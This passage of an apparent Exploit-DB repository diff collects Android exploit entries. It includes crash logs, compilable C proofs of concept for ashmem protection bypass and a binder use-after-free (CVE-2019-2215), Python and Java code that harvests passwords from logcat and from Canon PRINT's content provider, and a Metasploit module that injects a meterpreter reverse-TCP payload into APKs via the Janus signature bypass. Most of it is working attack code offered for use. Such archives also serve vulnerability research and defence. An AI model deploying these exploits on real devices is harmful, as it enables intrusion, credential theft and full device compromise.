2684: 94000000 bl 0 <__asan_load8>
2688: f9400e94 ldr x20, [x20, #24]
268c: aa1303e0 mov x0, x19
2690: 94000000 bl 0 <__asan_load8>
2694: f9400260 ldr x0, [x19]
==================================
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46941.zip

79
exploits/android/dos/47119.txt Normal file
View file

@ -0,0 +1,79 @@
CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2) #exploit #rce #android #stagefright #cve
More infos
LineageOS (Android):
02-11 20:18:48.238 260 260 D FFmpegExtractor: ffmpeg detected media content as 'video/hevc' with confidence 0.08
02-11 20:18:48.239 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths.
02-11 20:18:48.239 260 260 I FFMPEG : [hevc @ 0xb348f000] PPS id out of range: 0
02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths.
02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] PPS id out of range: 0
02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Error parsing NAL unit #5.
02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths.
mplayer (laptop)
id: 0
[hevc @ 0x7f0bf58a7560]Decoding VPS
[hevc @ 0x7f0bf58a7560]Main profile bitstream
[hevc @ 0x7f0bf58a7560]Decoding SPS
[hevc @ 0x7f0bf58a7560]Main profile bitstream
[hevc @ 0x7f0bf58a7560]Decoding VUI
[hevc @ 0x7f0bf58a7560]Decoding PPS
[hevc @ 0x7f0bf58a7560]Invalid tile widths.
[hevc @ 0x7f0bf58a7560]Decoding SEI
[hevc @ 0x7f0bf58a7560]Skipped PREFIX SEI 5
[hevc @ 0x7f0bf58a7560]PPS id out of range: 0
[hevc @ 0x7f0bf58a7560]Error parsing NAL unit #5.
Error while decoding frame!
This stops it when the tile width is bigger than allowed: https://gitlab.freedesktop.org/gstreamer/meson-ports/ffmpeg/blob/ebf648d490448d511b5fe970d76040169e65ef74/libavcodec/hevc_ps.c#L1526
So the check are there.
On stock/google Andoird I think it will use libhevc, not ffmpeg, when using VideoPlayer.
https://www.droidviews.com/enjoy-hevc-h-265-video-playback-on-android/
I have the google codec:
OMX.google.hevc.decoder
I am wondering however why it does not crash ....
Attaching the video (videopoc.mp4) that should trigger this condition:
if (value >= ps_sps->i2_pic_wd_in_ctb - start)
+ {
+ return IHEVCD_INVALID_HEADER;
+ }
Maybe somebody have more luck.
More infos 2
Whoooo hooo .... made it :)
Proof of concept is in hevc-crash-poc.mp4, other videos are for non andoird players.
Hvec-"fright" is possible. You can own the mobile by viewing a video with payload. In my example I didn't include real payload.
07-13 21:50:59.000 3351 3351 I /system/bin/tombstoned: received crash request for pid 24089
07-13 21:50:59.006 24089 24089 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
07-13 21:50:59.006 24089 24089 F DEBUG : Build fingerprint: 'samsung/hero2ltexx/hero2lte:8.0.0/R16NW/G935FXXS4ESC3:user/release-keys'
07-13 21:50:59.006 24089 24089 F DEBUG : Revision: '9'
07-13 21:50:59.006 24089 24089 F DEBUG : ABI: 'arm64'
07-13 21:50:59.006 24089 24089 F DEBUG : pid: 24089, tid: 24089, name: media.extractor >>> mediaextractor <<<
07-13 21:50:59.006 24089 24089 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7ccb800050
07-13 21:50:59.009 24089 24089 F DEBUG : x0 00000000ffffff36 x1 0000000000000000 x2 00000000000000f0 x3 0000000000000001
07-13 21:50:59.009 24089 24089 F DEBUG : x4 0000000000000001 x5 0000007ccb5df1b8 x6 0000007cc927363e x7 0000007cc8e7bd04
07-13 21:50:59.009 24089 24089 F DEBUG : x8 0000000000004170 x9 0000000000004160 x10 00000000ffffffff x11 0000007ccb7fbef0
07-13 21:50:59.010 24089 24089 F DEBUG : x12 0000007ccb5d3ce0 x13 000000000000001e x14 0000000000000003 x15 0000000000000001
07-13 21:50:59.010 24089 24089 F DEBUG : x16 0000007cc99f5f50 x17 0000007ccb88885c x18 0000007ccb566225 x19 0000007ccb562020
07-13 21:50:59.010 24089 24089 F DEBUG : x20 0000007ccb4f18a0 x21 0000007ccb468c6c x22 0000000000000000 x23 0000000000000006
07-13 21:50:59.010 24089 24089 F DEBUG : x24 000000000000001e x25 0000000000000094 x26 0000000000004160 x27 0000000000000001
07-13 21:50:59.010 24089 24089 F DEBUG : x28 0000007ccb55e750 x29 0000007fd6d39d90 x30 0000007cc99c4438
07-13 21:50:59.010 24089 24089 F DEBUG : sp 0000007fd6d39d20 pc 0000007cc99c44c4 pstate 0000000080000000
07-13 21:50:59.013 24089 24089 F DEBUG :
--
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47119.zip

24
exploits/android/dos/47920.txt Normal file
View file

@ -0,0 +1,24 @@
There is a memory corruption vulnerability in audio processing during a voice call in WeChat. When an RTP packet is processed, there is a call to UnpacketRTP. This function decrements the length of the packet by 12 without checking that the packet has at least 12 bytes in it. This leads to a negative packet length. Then, CAudioJBM::InputAudioFrameToJBM will check that the packet size is smaller than the size of a buffer before calling memcpy, but this check (n < 300) does not consider that the packet length could be negative due to the previous error. This leads to an out-of-bounds copy.
To reproduce the bug:
1) install and run frida on the caller Android device and a desktop host (https://www.frida.re)
2) copy the filed in the attached directory to /data/local/tmp/packs/, so that /data/local/tmp/packs/opack0 exists
3) run "setenforce 0" on the caller device
4) extract replay.py and replay.js into the same directory on a desktop host and run:
python3 replay.py DEVICENAME
Wait for the word "READY" to display.
If you don't know your device name, you can list device names by running:
python3 replay.py
5) start a voice call and answer it on the target device. A crash will occur in about 10 seconds.
A crash log is attached.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47920.zip

250
exploits/android/dos/47921.txt Normal file
View file

@ -0,0 +1,250 @@
This bug report describes two ways in which an attacker can modify the contents
of a read-only ashmem fd. I'm not sure at this point what the most interesting
user of ashmem is in the current Android release, but there are various users,
including Chrome and a bunch of utility classes.
In AOSP master, there is even code in
<https://android.googlesource.com/platform/art/+/master/runtime/jit/jit_memory_region.cc>
that uses ashmem for some JIT zygote mapping, which sounds extremely
interesting.
Android's ashmem kernel driver has an ->mmap() handler that attempts to lock
down created VMAs based on a configured protection mask such that in particular
write access to the underlying shmem file can never be gained. It tries to do
this as follows (code taken from upstream Linux
drivers/staging/android/ashmem.c):
static inline vm_flags_t calc_vm_may_flags(unsigned long prot)
{
return _calc_vm_trans(prot, PROT_READ, VM_MAYREAD) |
_calc_vm_trans(prot, PROT_WRITE, VM_MAYWRITE) |
_calc_vm_trans(prot, PROT_EXEC, VM_MAYEXEC);
}
[...]
static int ashmem_mmap(struct file *file, struct vm_area_struct *vma)
{
struct ashmem_area *asma = file->private_data;
[...]
/* requested protection bits must match our allowed protection mask */
if ((vma->vm_flags & ~calc_vm_prot_bits(asma->prot_mask, 0)) &
calc_vm_prot_bits(PROT_MASK, 0)) {
ret = -EPERM;
goto out;
}
vma->vm_flags &= ~calc_vm_may_flags(~asma->prot_mask);
[...]
if (vma->vm_file)
fput(vma->vm_file);
vma->vm_file = asma->file;
[...]
return ret;
}
This ensures that the protection flags specified by the caller don't conflict
with the ->prot_mask, and it also clears the VM_MAY* flags as needed to prevent
the user from afterwards adding new protection flags via mprotect().
However, it improperly stores the backing shmem file, whose ->mmap() handler
does not enforce the same restrictions, in ->vm_file. An attacker can abuse this
through the remap_file_pages() syscall, which grabs the file pointer of an
existing VMA and calls its ->mmap() handler to create a new VMA. In effect,
calling remap_file_pages(addr, size, 0, 0, 0) on an ashmem mapping allows an
attacker to raise the VM_MAYWRITE bit, allowing the attacker to gain write
access to the ashmem allocation's backing file via mprotect().
Reproducer (works both on Linux from upstream master in an X86 VM and on a
Pixel 2 at security patch level 2019-09-05 via adb):
====================================================================
user@vm:~/ashmem_remap$ cat ashmem_remap_victim.c
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#define __ASHMEMIOC 0x77
#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
#define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long)
int main(void) {
int ashmem_fd = open("/dev/ashmem", O_RDWR);
if (ashmem_fd == -1)
err(1, "open ashmem");
if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))
err(1, "ASHMEM_SET_SIZE");
char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap ashmem");
if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))
err(1, "ASHMEM_SET_SIZE");
mapping[0] = 'A';
printf("mapping[0] = '%c'\n", mapping[0]);
if (dup2(ashmem_fd, 42) != 42)
err(1, "dup2");
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child == 0) {
execl("./ashmem_remap_attacker", "ashmem_remap_attacker", NULL);
err(1, "execl");
}
int status;
if (wait(&status) != child) err(1, "wait");
printf("mapping[0] = '%c'\n", mapping[0]);
}user@vm:~/ashmem_remap$ cat ashmem_remap_attacker.c
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>
#include <err.h>
#include <stdlib.h>
#include <stdio.h>
int main(void) {
int ashmem_fd = 42;
/* sanity check */
char *write_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
if (write_mapping == MAP_FAILED) {
perror("mmap ashmem writable failed as expected");
} else {
errx(1, "trivial mmap ashmem writable worked???");
}
char *mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, ashmem_fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap ashmem readonly failed");
if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE) == 0)
errx(1, "mprotect ashmem writable worked???");
if (remap_file_pages(mapping, /*size=*/0x1000, /*prot=*/0, /*pgoff=*/0, /*flags=*/0))
err(1, "remap_file_pages");
if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE))
err(1, "mprotect ashmem writable failed, attack didn't work");
mapping[0] = 'X';
puts("attacker exiting");
}user@vm:~/ashmem_remap$ gcc -o ashmem_remap_victim ashmem_remap_victim.c
user@vm:~/ashmem_remap$ gcc -o ashmem_remap_attacker ashmem_remap_attacker.c
user@vm:~/ashmem_remap$ ./ashmem_remap_victim
mapping[0] = 'A'
mmap ashmem writable failed as expected: Operation not permitted
attacker exiting
mapping[0] = 'X'
user@vm:~/ashmem_remap$
====================================================================
Interestingly, the (very much deprecated) syscall remap_file_pages() isn't even
listed in bionic's SYSCALLS.txt, which would normally cause it to be blocked by
Android's seccomp policy; however, SECCOMP_WHITELIST_APP.txt explicitly permits
it for 32-bit ARM applications:
# b/36435222
int remap_file_pages(void *addr, size_t size, int prot, size_t pgoff, int flags) arm,x86,mips
ashmem supports purgable memory via ASHMEM_UNPIN/ASHMEM_PIN. Unfortunately,
there is no access control for these - even if you only have read-only access to
an ashmem file, you can still mark pages in it as purgable, causing them to
effectively be zeroed out when the system is under memory pressure. Here's a
simple test for that (to be run in an X86 Linux VM):
====================================================================
user@vm:~/ashmem_purging$ cat ashmem_purge_victim.c
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#define __ASHMEMIOC 0x77
#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
#define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long)
int main(void) {
int ashmem_fd = open("/dev/ashmem", O_RDWR);
if (ashmem_fd == -1)
err(1, "open ashmem");
if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))
err(1, "ASHMEM_SET_SIZE");
char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap ashmem");
if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))
err(1, "ASHMEM_SET_SIZE");
mapping[0] = 'A';
printf("mapping[0] = '%c'\n", mapping[0]);
if (dup2(ashmem_fd, 42) != 42)
err(1, "dup2");
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child == 0) {
execl("./ashmem_purge_attacker", "ashmem_purge_attacker", NULL);
err(1, "execl");
}
int status;
if (wait(&status) != child) err(1, "wait");
printf("mapping[0] = '%c'\n", mapping[0]);
}
user@vm:~/ashmem_purging$ cat ashmem_purge_attacker.c
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
struct ashmem_pin {
unsigned int offset, len;
};
#define __ASHMEMIOC 0x77
#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
#define ASHMEM_UNPIN _IOW(__ASHMEMIOC, 8, struct ashmem_pin)
int main(void) {
struct ashmem_pin pin = { 0, 0 };
if (ioctl(42, ASHMEM_UNPIN, &pin))
err(1, "unpin 42");
/* ensure that shrinker doesn't get skipped */
int ashmem_fd = open("/dev/ashmem", O_RDWR);
if (ashmem_fd == -1)
err(1, "open ashmem");
if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x100000))
err(1, "ASHMEM_SET_SIZE");
char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap ashmem");
if (ioctl(ashmem_fd, ASHMEM_UNPIN, &pin))
err(1, "unpin 42");
/* simulate OOM */
system("sudo sh -c 'echo 2 > /proc/sys/vm/drop_caches'");
puts("attacker exiting");
}
user@vm:~/ashmem_purging$ gcc -o ashmem_purge_victim ashmem_purge_victim.c
user@vm:~/ashmem_purging$ gcc -o ashmem_purge_attacker ashmem_purge_attacker.c
user@vm:~/ashmem_purging$ ./ashmem_purge_victim
mapping[0] = 'A'
attacker exiting
mapping[0] = ''
user@vm:~/ashmem_purging$
====================================================================

48
exploits/android/local/46933.txt Normal file
View file

@ -0,0 +1,48 @@
#Exploit title: EquityPandit v1.0 - Insecure Logging
#Date:27/05/2019
#Exploit Author: ManhNho
#Software name: "EquityPandit"
#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
#Version: 1.0
# Category: Android apps
#Description:
- Sometimes developers keeps sensitive data logged into the developer
console. Thus, attacker easy to capture sensitive information like password.
- In this application, with adb, attacker can capture password of any
users via forgot password function.
#Requirement:
- Santoku virtual machine
- Android virtual machine (installed "EquityPandit" apk file)
- Victim user/password: victim@abc.com/123456
- Exploit code named capture.py in Santoku vm as below:
import subprocess
import re
process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
stdout=subprocess.PIPE)
dumps = process_handler.stdout.read()
password_list = re.findall(r'password\s(.*)', dumps)
print 'Captured %i passwords! \nThey are:' %len(password_list)
for index, item in enumerate(password_list):
print '\t#%i: %s' %(int(index)+1, item)
#Reproduce:
- Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)
adb connect x.x.x.x
- Step 2: From Android machine, open EquityPandit, click forgot password
function for acccount "victim@abc.com" and then click submit
- Step 3: From Santoku, execute capture.py
- Actual: Password of "victim@abc.com" will be show in terminal as
"123456"
#Demo:
https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv

129
exploits/android/local/47321.txt Normal file
View file

@ -0,0 +1,129 @@
# Exploit Title: Content Provider URI Injection on Canon PRINT 2.5.5
(CVE-2019-14339)
# Date: 24th July, 2019
# Exploit Author: 0x48piraj
# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home/explore/printing-innovations/mobile-printing/canon-print-app
# Software Link: https://play.google.com/store/apps/details?id=jp.co.canon.bsd.ad.pixmaprint
<https://play.google.com/store/apps/details?id=jp.co.canon.bsd.ad.pixmaprint&hl=en_IN>#
Exploit : https://github.com/0x48piraj/CVE-2019-14339
# Version: Canon PRINT 2.5.5
# Tested on: Android 8.0.0
# CVE : CVE-2019-14339
The ContentProvider in the Canon PRINT 2.5.5 application for Android
does not properly restrict data access. This allows an attacker's
malicious application to obtain sensitive information including
factory passwords for administrator web-interface and WPA2-PSK key.
The mobile application contains unprotected exported content providers
('IJPrinterCapabilityProvider' in android/AndroidManifest.xml) that
discloses sensitive applications data under certain conditions. To
securely export the content provider, one should restrict access to it
by setting up android:protectionLevel or android:grantUriPermissions
attributes in Android Manifest file.
-- Proof-of-concept code (Java)
--
package cannon.print.pwn;
import android.database.Cursor;
import android.net.Uri;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import android.widget.Toast;
import org.apache.commons.lang3.StringUtils; //
https://stackoverflow.com/a/50198499
public class MainActivity extends AppCompatActivity {
Button PwnBtn;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
PwnBtn = (Button) findViewById(R.id.button);
PwnBtn.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
Toast.makeText(getApplicationContext(), "Payload
triggered ...", Toast.LENGTH_SHORT).show();
Uri cannonURI =
Uri.parse("content://canon.ij.printer.capability.data/");
Cursor cursor = getContentResolver().query(cannonURI,
null, null, null, null);
int count = cursor.getCount();
TextView data=(TextView)findViewById(R.id.data);
data.setText(String.valueOf(count));
cursor.moveToFirst();
String tempstr = " ";
tempstr =" "+tempstr +"\t"+ cursor.getString(0) + "\t\t\t"
+ cursor.getString(1) + "\t\t\t" + cursor.getString(2);
String dpw = StringUtils.substringBetween(tempstr,
"<ivec:product_serialnumber>", "</ivec:product_serialnumber>");
String dmac = cursor.getString(4);
String mdeviceid = cursor.getString(13); // raw
String dtype = StringUtils.substringBetween(mdeviceid,
";CLS:", ";DES");
String timestamp = cursor.getString(15); // ticks,
device last used
String dclass = StringUtils.substringBetween(tempstr,
"<ivec:manufacturer>", "</ivec:manufacturer>");
String dmodel = StringUtils.substringBetween(tempstr,
"<ivec:model>", "</ivec:model>");
String dserial = StringUtils.substringBetween(tempstr,
"<ivec:serialnumber>", "</ivec:serialnumber>");
String dfmver = StringUtils.substringBetween(tempstr,
"<ivec:firmver>", "</ivec:firmver>");
String dservice =
StringUtils.substringBetween(tempstr, "<ivec:service>",
"</ivec:service>");
/* More juicy data
String denv = StringUtils.substringBetween(tempstr,
"<vcn:host_environment>", "</vcn:host_environment>");
String dpapertype =
StringUtils.substringBetween(tempstr, "<ivec:papertype>",
"</ivec:papertype>");
String dformats =
StringUtils.substringBetween(tempstr, "<ivec:support_data_format>",
"</ivec:support_data_format>");
*/
String fout = String.format("Device Type : %s\nDevice
Class : %s\nDevice Model : %s\nDevice Serial : %s\nDevice MAC Address
: %s\nDevice Factory Password : %s\nDevice Firmware Version :
%s\nDevice Services : %s\nDevice Last Used : %s\n", dtype, dclass,
dmodel, dserial, dmac, dpw, dfmver, dservice, timestamp);
data.setText(fout);
}
});
}
}
-- Proof-of-concept python script over ADB --
import subprocess, datetime, sys
def ext(out, var, rw=';'):
return out.split(var)[1].split(rw)[0]
print("[#] Make sure you've connected the target device w/ adb ...")
print("[*] Running the exploit using adb ...\n\n")
out = subprocess.getoutput("adb shell content query --uri content://canon.ij.printer.capability.data/")
if "<ivec:contents>" not in out:
print("[!] Error: Couldn't fetch data from adb ...")
sys.exit(1)
varz = [";CLS:", ";MDL:", ";DES:", ";VER:", ";PSE:"] #
factory_pw_check =
out.split("<ivec:product_serialnumber>")[1].split('</ivec:product_serialnumber>')[0]
prmz = ["Class", "Model", "Description", "Firmware Version", "Factory Password"]
for prm, var in zip(prmz, varz):
print(" -- Device %s : %s" % (prm, ext(out, var)))
print(" -- Device MAC Address : {}".format(ext(out, 'mmacaddress=', ',')))
print(" -- Device Last Used : %s" % (datetime.timedelta(microseconds =
int(ext(out,', timestamp=', ', '))/10)))

80
exploits/android/local/47463.txt Normal file
View file

@ -0,0 +1,80 @@
The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm (and possibly others):
There is a use-after-free of the wait member in the binder_thread struct in the binder driver at /drivers/android/binder.c.
As described in the upstream commit:
“binder_poll() passes the thread->wait waitqueue that
can be slept on for work. When a thread that uses
epoll explicitly exits using BINDER_THREAD_EXIT,
the waitqueue is freed, but it is never removed
from the corresponding epoll data structure. When
the process subsequently exits, the epoll cleanup
code tries to access the waitlist, which results in
a use-after-free.”
The following proof-of-concept will show the UAF crash in a kernel build with KASAN (from initial upstream bugreport at https://lore.kernel.org/lkml/20171213000517.GB62138@gmail.com/):
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>
#define BINDER_THREAD_EXIT 0x40046208ul
int main()
{
int fd, epfd;
struct epoll_event event = { .events = EPOLLIN };
fd = open("/dev/binder0", O_RDONLY);
epfd = epoll_create(1000);
epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
ioctl(fd, BINDER_THREAD_EXIT, NULL);
}
This issue was patched in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4], but the Pixel 2 with most recent security bulletin is still vulnerable based on source code review.
Other devices which appear to be vulnerable based on source code review are (referring to 8.x releases unless otherwise stated):
1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
2) Huawei P20
3) Xiaomi Redmi 5A
4) Xiaomi Redmi Note 5
5) Xiaomi A1
6) Oppo A3
7) Moto Z3
8) Oreo LG phones (run same kernel according to website)
9) Samsung S7, S8, S9
*We have evidence that this bug is being used in the wild. Therefore, this bug is subject to a 7 day disclosure deadline. After 7 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.*
Confirmed this proof-of-concept works on Pixel 2 with build walleye_kasan-userdebug 10 QP1A.191105.0035899767, causing KASAN crash. Proof of concept C code and new.out attached. KASAN console output attached.
I received technical information from TAG and external parties about an Android exploit that is attributed to NSO group. These details included facts about the bug and exploit methodology, including but not limited to:
* It is a kernel privilege escalation using a use-after free vulnerability, accessible from inside the Chrome sandbox.
* The bug was allegedly being used or sold by the NSO Group.
* It works on Pixel 1 and 2, but not Pixel 3 and 3a.
* It was patched in the Linux kernel >= 4.14 without a CVE.
* CONFIG_DEBUG_LIST breaks the primitive.
* CONFIG_ARM64_UAO hinders exploitation.
* The vulnerability is exploitable in Chrome's renderer processes under Android's 'isolated_app' SELinux domain, leading to us suspecting Binder as the vulnerable component.
* The exploit requires little or no per-device customization.
* A list of affected and unaffected devices and their versions, and more. A non-exhaustive list is available in the description of this issue.
Using these details, I have determined that the bug being used is almost certainly the one in this report as I ruled out other potential candidates by comparing patches. A more detailed explanation of this bug and the methodology to identify it will be written up in a forthcoming blog post when I find the time.
We do not currently have a sample of the exploit. Without samples, we have neither been able to confirm the timeline nor the payload.
The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox.
Ive attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215. Ive also attached a screenshot (success.png) of the POC running on a Pixel 2, running Android 10 with security patch level September 2019 (google/walleye/walleye:10/QP1A.190711.020/5800535:user/release-keys).
Vendor statement from Android:
"This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit. We have notified Android partners and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update."
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47463.zip

162
exploits/android/local/47601.rb Executable file
View file

@ -0,0 +1,162 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/payload/apk'
class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking
include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Post::Android::Priv
include Msf::Payload::Android
def initialize(info={})
super( update_info( info, {
'Name' => "Android Janus APK Signature bypass",
'Description' => %q{
This module exploits CVE-2017-13156 in Android to install a payload into another
application. The payload APK will have the same signature and can be installed
as an update, preserving the existing data.
The vulnerability was fixed in the 5th December 2017 security patch, and was
additionally fixed by the APK Signature scheme v2, so only APKs signed with
the v1 scheme are vulnerable.
Payload handler is disabled, and a multi/handler must be started first.
},
'Author' => [
'GuardSquare', # discovery
'V-E-O', # proof of concept
'timwr', # metasploit module
'h00die', # metasploit module
],
'References' => [
[ 'CVE', '2017-13156' ],
[ 'URL', 'https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures' ],
[ 'URL', 'https://github.com/V-E-O/PoC/tree/master/CVE-2017-13156' ],
],
'DisclosureDate' => 'Jul 31 2017',
'SessionTypes' => [ 'meterpreter' ],
'Platform' => [ 'android' ],
'Arch' => [ ARCH_DALVIK ],
'Targets' => [ [ 'Automatic', {} ] ],
'DefaultOptions' => {
'PAYLOAD' => 'android/meterpreter/reverse_tcp',
'AndroidWakelock' => false, # the target may not have the WAKE_LOCK permission
'DisablePayloadHandler' => true,
},
'DefaultTarget' => 0,
'Notes' => {
'SideEffects' => ['ARTIFACTS_ON_DISK', 'SCREEN_EFFECTS'],
'Stability' => ['SERVICE_RESOURCE_LOSS'], # ZTE youtube app won't start anymore
}
}))
register_options([
OptString.new('PACKAGE', [true, 'The package to target, or ALL to attempt all', 'com.phonegap.camerasample']),
])
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
]
end
def check
os = cmd_exec("getprop ro.build.version.release")
unless Gem::Version.new(os).between?(Gem::Version.new('5.1.1'), Gem::Version.new('8.0.0'))
vprint_error "Android version #{os} is not vulnerable."
return CheckCode::Safe
end
vprint_good "Android version #{os} appears to be vulnerable."
patch = cmd_exec('getprop ro.build.version.security_patch')
if patch.empty?
print_status 'Unable to determine patch level. Pre-5.0 this is unaccessible.'
elsif patch > '2017-12-05'
vprint_error "Android security patch level #{patch} is patched."
return CheckCode::Safe
else
vprint_good "Android security patch level #{patch} is vulnerable"
end
CheckCode::Appears
end
def exploit
def infect(apkfile)
unless apkfile.start_with?("package:")
fail_with Failure::BadConfig, 'Unable to locate app apk'
end
apkfile = apkfile[8..-1]
print_status "Downloading APK: #{apkfile}"
apk_data = read_file(apkfile)
begin
# Create an apk with the payload injected
apk_backdoor = ::Msf::Payload::Apk.new
apk_zip = apk_backdoor.backdoor_apk(nil, payload.encoded, false, false, apk_data, false)
# Extract the classes.dex
dex_data = ''
Zip::File.open_buffer(apk_zip) do |zipfile|
dex_data = zipfile.read("classes.dex")
end
dex_size = dex_data.length
# Fix the original APKs zip file code directory
cd_end_addr = apk_data.rindex("\x50\x4b\x05\x06")
cd_start_addr = apk_data[cd_end_addr+16, cd_end_addr+20].unpack("V")[0]
apk_data[cd_end_addr+16...cd_end_addr+20] = [ cd_start_addr+dex_size ].pack("V")
pos = cd_start_addr
while pos && pos < cd_end_addr
offset = apk_data[pos+42, pos+46].unpack("V")[0]
apk_data[pos+42...pos+46] = [ offset+dex_size ].pack("V")
pos = apk_data.index("\x50\x4b\x01\x02", pos+46)
end
# Prepend the new classes.dex to the apk
out_data = dex_data + apk_data
out_data[32...36] = [ out_data.length ].pack("V")
out_data = fix_dex_header(out_data)
out_apk = "/sdcard/#{Rex::Text.rand_text_alphanumeric 6}.apk"
print_status "Uploading APK: #{out_apk}"
write_file(out_apk, out_data)
register_file_for_cleanup(out_apk)
print_status "APK uploaded"
# Prompt the user to update the APK
session.appapi.app_install(out_apk)
print_status "User should now have a prompt to install an updated version of the app"
true
rescue => e
print_error e.to_s
false
end
end
unless [CheckCode::Detected, CheckCode::Appears].include? check
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if datastore["PACKAGE"] == 'ALL'
vprint_status('Finding installed packages (this can take a few minutes depending on list of installed packages)')
apkfiles = []
all = cmd_exec("pm list packages").split("\n")
c = 1
all.each do |package|
package = package.split(':')[1]
vprint_status("Attempting exploit of apk #{c}/#{all.length} for #{package}")
c += 1
next if ['com.metasploit.stage', # avoid injecting into ourself
].include? package # This was left on purpose to be expanded as need be for testing
result = infect(cmd_exec("pm path #{package}"))
break if result
end
else
infect(cmd_exec("pm path #{datastore["PACKAGE"]}"))
end
end
end

67
exploits/android/local/48129.rb Executable file
View file

@ -0,0 +1,67 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Common
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super( update_info( info, {
'Name' => "Android Binder Use-After-Free Exploit",
'Description' => %q{
},
'License' => MSF_LICENSE,
'Author' => [
'Jann Horn', # discovery and exploit
